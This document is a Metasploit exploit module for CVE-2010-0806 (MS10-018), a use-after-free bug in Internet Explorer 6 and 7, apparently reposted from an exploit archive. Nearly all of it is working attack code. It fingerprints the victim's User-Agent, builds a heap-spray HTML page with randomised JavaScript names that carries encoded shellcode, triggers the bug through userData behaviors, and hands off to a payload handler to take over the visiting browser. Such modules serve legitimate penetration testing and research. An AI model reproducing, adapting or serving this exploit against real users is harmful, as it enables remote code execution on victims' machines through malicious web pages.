Internet Explorer DTHML Behaviors Use After Free

`##  
# $Id: ms10_018_ie_behaviors.rb 8968 2010-03-31 22:36:10Z jduck $  
##  
  
##  
# This file is part of the Metasploit Framework and may be subject to  
# redistribution and commercial restrictions. Please see the Metasploit  
# Framework web site for more information on licensing and terms of use.  
# http://metasploit.com/framework/  
##  
  
##  
# originally ie_iepeers_pointer.rb  
#  
# Microsoft Internet Explorer iepeers.dll use-after-free exploit for the Metasploit Framework  
#  
# Tested successfully on the following platforms:  
# - Microsoft Internet Explorer 7, Windows Vista SP2  
# - Microsoft Internet Explorer 7, Windows XP SP3  
# - Microsoft Internet Explorer 6, Windows XP SP3  
#  
# Exploit found in-the-wild. For additional details:  
# http://www.rec-sec.com/2010/03/10/internet-explorer-iepeers-use-after-free-exploit/  
#  
# Trancer  
# http://www.rec-sec.com  
##  
  
require 'msf/core'  
  
class Metasploit3 < Msf::Exploit::Remote  
Rank = GoodRanking  
  
include Msf::Exploit::Remote::HttpServer::HTML  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'Internet Explorer DTHML Behaviors Use After Free',  
'Description' => %q{  
This module exploits a use-after-free vulnerability within the DTML behaviors  
functionality of Microsoft Internet Explorer versions 6 and 7. This bug was   
discovered being used in-the-wild and was previously known as the "iepeers"  
vulnerability. The name comes from Microsoft's suggested workaround to block  
access to the iepeers.dll file.  
  
According to Nico Waisman, "The bug itself is when trying to persist an object  
using the setAttribute, which end up calling VariantChangeTypeEx with both the  
source and the destination being the same variant. So if you send as a variant  
an IDISPATCH the algorythm will try to do a VariantClear of the destination before  
using it. This will end up on a call to PlainRelease which decref the reference  
and clean the object."  
  
NOTE: Internet Explorer 8 and Internet Explorer 5 are not affected.  
},  
'License' => MSF_LICENSE,  
'Author' =>  
[  
'unknown', # original discovery  
'Trancer <mtrancer[at]gmail.com>', # metasploit module  
'Nanika', # HIT2010 IE7 reliable PoC  
'jduck' # minor cleanups  
],  
'Version' => '$Revision: 8968 $',  
'References' =>  
[  
[ 'CVE', '2010-0806' ],  
[ 'OSVDB', '62810' ],  
[ 'BID', '38615' ],  
[ 'URL', 'http://www.microsoft.com/technet/security/advisory/981374.mspx' ],  
[ 'URL', 'http://www.avertlabs.com/research/blog/index.php/2010/03/09/targeted-internet-explorer-0day-attack-announced-cve-2010-0806/' ],  
[ 'URL', 'http://eticanicomana.blogspot.com/2010/03/aleatory-persitent-threat.html' ],  
[ 'MSB', 'MS10-018' ],  
],  
'DefaultOptions' =>  
{  
'EXITFUNC' => 'process',  
'InitialAutoRunScript' => 'migrate -f',  
},  
'Payload' =>  
{  
'Space' => 1024,  
'BadChars' => "\x00\x09\x0a\x0d'\\",  
'StackAdjustment' => -3500,  
},  
'Platform' => 'win',  
'Targets' =>  
[  
[ '(Automatic) IE6, IE7 on Windows NT, 2000, XP, 2003 and Vista',  
{  
'Method' => 'automatic'  
}  
],  
  
[ 'IE 6 SP0-SP2 (onclick)',  
{  
'Method' => 'onclick',  
'Ret' => 0x0C0C0C0C  
}  
],  
  
# "A great celebration of HIT2010" - http://www.hitcon.org/  
[ 'IE 7.0 (marquee)',  
{  
'Method' => 'marquee',   
'Ret' => 0x0C0C0C0C  
}   
],  
],  
'DisclosureDate' => 'Mar 09 2010',  
'DefaultTarget' => 0))  
end  
  
  
def auto_target(cli, request)  
mytarget = nil  
  
agent = request.headers['User-Agent']  
#print_status("Checking user agent: #{agent}")  
if agent =~ /Windows NT 6\.0/  
mytarget = targets[2] # IE7 on Vista  
elsif agent =~ /MSIE 7\.0/  
mytarget = targets[2] # IE7 on XP and 2003  
elsif agent =~ /MSIE 6\.0/  
mytarget = targets[1] # IE6 on NT, 2000, XP and 2003  
else  
print_error("Unknown User-Agent #{agent} from #{cli.peerhost}:#{cli.peerport}")  
end  
  
mytarget  
end  
  
  
def on_request_uri(cli, request)  
  
if target['Method'] == 'automatic'  
mytarget = auto_target(cli, request)  
if (not mytarget)  
send_not_found(cli)  
return  
end  
else  
mytarget = target  
end  
  
# Re-generate the payload  
return if ((p = regenerate_payload(cli)) == nil)  
  
print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport} (target: #{mytarget.name})...")  
  
# Encode the shellcode  
shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(mytarget.arch))  
  
# Set the return\nops  
ret = Rex::Text.to_unescape([mytarget.ret].pack('V'))  
  
# Randomize the javascript variable names  
j_shellcode = rand_text_alpha(rand(100) + 1)  
j_nops = rand_text_alpha(rand(100) + 1)  
j_slackspace = rand_text_alpha(rand(100) + 1)  
j_fillblock = rand_text_alpha(rand(100) + 1)  
j_memory = rand_text_alpha(rand(100) + 1)  
j_counter = rand_text_alpha(rand(30) + 2)  
j_ret = rand_text_alpha(rand(100) + 1)  
j_array = rand_text_alpha(rand(100) + 1)  
j_function1 = rand_text_alpha(rand(100) + 1)  
j_function2 = rand_text_alpha(rand(100) + 1)  
j_object = rand_text_alpha(rand(100) + 1)  
j_id = rand_text_alpha(rand(100) + 1)  
  
# Construct the final page  
case mytarget['Method']  
  
when 'onclick'  
html = %Q|<html><body>  
<button id='#{j_id}' onclick='#{j_function2}();' style='display:none'></button>  
<script language='javascript'>  
function #{j_function1}(){  
var #{j_shellcode} = unescape('#{shellcode}');  
#{j_memory} = new Array();  
var #{j_slackspace} = 0x86000-(#{j_shellcode}.length*2);  
var #{j_nops} = unescape('#{ret}');  
while(#{j_nops}.length<#{j_slackspace}/2) { #{j_nops}+=#{j_nops}; }  
var #{j_fillblock} = #{j_nops}.substring(0,#{j_slackspace}/2);  
delete #{j_nops};  
for(#{j_counter}=0; #{j_counter}<270; #{j_counter}++) {  
#{j_memory}[#{j_counter}] = #{j_fillblock} + #{j_fillblock} + #{j_shellcode};  
}  
}  
function #{j_function2}(){  
#{j_function1}();  
var #{j_object} = document.createElement('body');  
#{j_object}.addBehavior('#default#userData');  
document.appendChild(#{j_object});  
try {  
for (#{j_counter}=0; #{j_counter}<10; #{j_counter}++) {  
#{j_object}.setAttribute('s',window);  
}  
} catch(e){ }  
window.status+='';  
}  
  
document.getElementById('#{j_id}').onclick();  
</script></body></html>  
|  
  
when 'marquee'  
j_attrib = rand_text_alpha(6);  
html = %Q|<html>  
<head>  
<style type="text/css">  
.#{j_object} {behavior: url(#default#userData);}  
</style>  
</head>  
<script>  
function #{j_function1}(){  
var #{j_shellcode} = unescape('#{shellcode}');  
#{j_memory} = new Array();  
var #{j_slackspace} = 0x86000-(#{j_shellcode}.length*2);  
var #{j_nops} = unescape('#{ret}');  
while(#{j_nops}.length<#{j_slackspace}/2) { #{j_nops}+=#{j_nops}; }  
var #{j_fillblock} = #{j_nops}.substring(0,#{j_slackspace}/2);  
delete #{j_nops};  
for(#{j_counter}=0; #{j_counter}<270; #{j_counter}++) {  
#{j_memory}[#{j_counter}] = #{j_fillblock} + #{j_fillblock} + #{j_shellcode};  
}  
}  
function #{j_function2}() {  
#{j_function1}();  
for (#{j_counter} = 1; #{j_counter} <10; #{j_counter} ++ ){  
#{j_id}.setAttribute("#{j_attrib}",document.location);  
}  
#{j_id}.setAttribute("#{j_attrib}",document.getElementsByName("style"));  
document.location="about:\\u0c0c\\u0c0c\\u0c0c\\u0c0cblank";  
}  
</script>  
<body onload="#{j_function2}();"></body>  
<MARQUEE id="#{j_id}" class="#{j_object}"></MARQUEE>  
</html>  
|  
  
end  
  
# Transmit the compressed response to the client  
send_response(cli, html, { 'Content-Type' => 'text/html' })  
  
# Handle the payload  
handler(cli)  
  
end  
  
end  
`